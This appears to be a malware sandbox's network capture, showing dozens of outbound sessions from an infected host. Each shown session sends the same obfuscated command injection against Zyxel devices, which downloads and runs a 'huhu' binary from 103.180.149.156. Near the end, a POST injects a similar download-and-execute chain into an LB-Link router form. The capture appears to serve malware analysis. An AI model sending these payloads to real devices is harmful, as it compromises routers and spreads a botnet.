                                            Feb 2, 2024 06:21:23.851865053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7436192.168.2.153338824.251.202.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851924896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7437192.168.2.155144679.240.193.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851924896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7438192.168.2.1546498191.78.22.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.851944923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7439192.168.2.1536194158.254.187.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852015972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7440192.168.2.153934287.247.124.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852046013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7441192.168.2.1556156130.63.254.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852104902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7442192.168.2.1547726197.73.151.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852149963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7443192.168.2.154211690.240.196.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852174997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7444192.168.2.154916488.204.94.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852229118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7445192.168.2.1537614134.12.72.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852258921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7446192.168.2.1560802217.85.231.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852292061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7447192.168.2.15426889.69.13.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852315903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7448192.168.2.1553666219.105.37.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852349997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7449192.168.2.15607708.74.157.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852392912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7450192.168.2.1554920135.220.242.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852427006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7451192.168.2.155114027.196.167.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852464914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7452192.168.2.1557868222.145.171.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.852507114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7453192.168.2.1556486140.91.179.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.855782986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7454192.168.2.153995884.27.189.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.855865955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7455192.168.2.1542410157.136.137.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.855899096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7456192.168.2.1547228150.58.71.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.856892109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7457192.168.2.154600686.210.49.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.856960058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7458192.168.2.155192661.162.213.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.856995106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7459192.168.2.153642075.52.8.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857057095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7460192.168.2.153799050.95.178.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857081890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7461192.168.2.153367057.10.159.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857110023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7462192.168.2.1539098115.15.252.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857141972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7463192.168.2.1535560110.27.114.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857198000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7464192.168.2.1552488183.171.135.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857228041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7465192.168.2.154560876.132.67.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857270956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7466192.168.2.1541254213.223.133.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857304096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7467192.168.2.1543208115.0.193.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857343912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7468192.168.2.15374184.209.143.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857399940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7469192.168.2.155330665.60.136.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857435942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7470192.168.2.1543178186.52.243.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857471943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7471192.168.2.1548674183.153.212.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857502937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7472192.168.2.1539322199.22.176.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857531071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7473192.168.2.1554394155.201.62.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857557058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7474192.168.2.155304873.166.168.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857608080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7475192.168.2.1546614137.163.235.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857651949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7476192.168.2.1549554111.210.245.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857692957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7477192.168.2.1543722170.137.222.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857716084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7478192.168.2.1545220157.92.137.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857774019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7479192.168.2.1556804171.172.190.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857815027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7480192.168.2.1545862103.199.69.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857877016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7481192.168.2.153338837.75.163.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857918978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7482192.168.2.154785488.46.73.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857954025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7483192.168.2.153476823.200.124.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.857997894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7484192.168.2.1533040218.234.205.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858042002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7485192.168.2.1547880180.112.104.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858074903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7486192.168.2.1543902166.169.127.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858094931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7487192.168.2.1534366205.48.161.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858140945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7488192.168.2.1538132216.217.162.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858181000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7489192.168.2.153815063.122.190.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858206987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7490192.168.2.154912296.174.36.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858251095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7491192.168.2.1543414176.151.155.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858314037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7492192.168.2.1532942166.190.132.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858346939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7493192.168.2.1533100196.166.37.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858390093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7494192.168.2.154812668.167.233.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.858419895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7495192.168.2.155398269.215.203.298080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.782006025 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:24.916865110 CET385INHTTP/1.1 401 Access Denied
                                            Server: MailEnable-HTTP/5.0
                                            Date: Fri, 02 Feb 2024 05:21:24 GMT
                                            Pragma: no-cache
                                            Cache-Control: no-cache
                                            Content-Encoding: identity
                                            Connection: close
                                            Content-Length: 0
                                            WWW-Authenticate: Digest Realm="MEHTTPMail",nonce="<2596.4276021@2048>"
                                            WWW-Authenticate: Basic Realm="MEHTTPMail"
                                            Content-Type: text/xml
                                            X-Dav-Error: 200 No error


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7496192.168.2.155472869.93.176.42443
                                            TimestampBytes transferredDirectionData
